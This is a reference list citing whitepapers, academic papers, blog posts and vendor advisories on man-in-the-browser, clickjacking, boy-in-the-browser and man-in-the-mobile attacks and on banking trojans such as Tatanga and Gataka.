    C. Cain, SANS Institute - Analyzing Man-in-the-Browser (MITB) Attacks (https://www.sans.org/reading-room/whitepapers/forensics/analyzing-man-in-the-browser-mitb-attacks-35687)

    O. Eisen, 41st Parameter - Catching the fraudulent 'Man-in-the-Middle' and 'Man-in-the-Browser' (http://www.the41.com/sites/default/files/MITM%20and%20MITB%20Overview_41st%20Parameter.pdf)

    J. Dossogne, O. Markowitch - Online banking and man in the browser attacks: Survey of the Belgian situation (http://www.ulb.ac.be/di/scsi/markowitch/publications/wic2010b.pdf)

    M. Stahlberg, F-Secure - The Trojan money spinner (https://www.f-secure.com/weblog/archives/VB2007_TheTrojanMoneySpinner.pdf)

    OWASP - Man in the browser attack (https://www.owasp.org/index.php/Man-in-the-browser_attack)

    Trusteer/IBM - How Man-in-the-Browser (MitB) Malware Works (video) (http://securityintelligence.com/media/malware-man-in-the-browser-mitb-how-works-video)

    ISACA - Man in the Browser: A Threat to Online Banking (http://www.isacajournal-digital.org/isacajournal/2013vol4?folio=16#pg18)

    Almeida, Buyuksahin, Dimogerontakis, Tarhan - Man in the browser attacks

    A. Nordbo - Man-in-the-browser to retrieve content of SSL connections (https://andynor.net/static/fileupload/419/S2_SoftSecTrends_Man-in-the-browser.pdf)

    Wells, Hutchinson, Pierce, Edith Cowan University - Enhanced Security for Preventing Man-in-the-Middle Attacks in Authentication, Data Entry and Transaction Verification (http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1057&context=ism)

    Sood, Enbody, Michigan State University - The Art of Cyber Bank Robbery (http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-Sood.pdf)

    T. Siebert - Advanced Techniques in Modern Banking Trojans (https://www.botconf.eu/wp-content/uploads/2013/12/02-BankingTrojans-ThomasSiebert.pdf)

    R. Hansen, SecTheory - Clickjacking (http://www.sectheory.com/clickjacking.htm)

    T. Hunt - Clickjack attack: the hidden threat right in front of you (http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html)

    J. Grossman - Clickjacking: Web pages can see and hear you (http://jeremiahgrossman.blogspot.com.au/2008/10/clickjacking-web-pages-can-see-and-hear.html)

    L. Huang, A. Moshchuk, H. J. Wang, S. Schechter, C. Jackson - Clickjacking: Attacks and Defences (https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final39.pdf)

    S. Johnson - Social engineering attacks: Is security focused on the wrong problem? (http://searchsecurity.techtarget.com/feature/Social-engineering-attacks-Is-security-focused-on-the-wrong-problem)

    G. Rydstedt, E. Bursztein, D. Boneh, C. Jackson - Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites (http://crypto.stanford.edu/~dabo/pubs/papers/framebust.pdf)

    PC Tools - The Boy-in-the-Browser is more than Just Mischievous (http://www.pctools.com/security-news/bitb-trojan/)

    Imperva - Boy in the Browser (http://www.imperva.com/DefenseCenter/ThreatAdvisories/Boy_in_the_Browser)

    B. Prince - Boy-in-the-Browser Attacks Come Out and Play (http://www.eweek.com/security-watch/boy-in-the-browser-attacks-come-out-and-play.html)

    InfoSecurity Magazine - Man in the Browser (MITB) becomes Man in the Mobile (MITMO) (http://www.infosecurity-magazine.com/news/man-in-the-browser-mitb-becomes-man-in-the-mobile/)

    A. Klein - Tatanga Trojan Bypasses Mobile Security to Steal Money from Online Banking Users in Germany (http://securityintelligence.com/tatanga-trojan-bypasses-mobile-security-to-steal-money-from-online-banking-users-in-germany/#.VQKojY6Ud8F)

    A. Klein - Man-in-the-Mobile Attacks Single Out Android (http://securityintelligence.com/man-in-the-mobile-attacks-single-out-android/#.VQKpJY6Ud8G)

    J. Boutin - Win32/Gataka: a banking Trojan ready to take off? (http://www.eset.com/int/about/blog/blog/article/win32gataka-a-banking-trojan-ready-to-take-off/)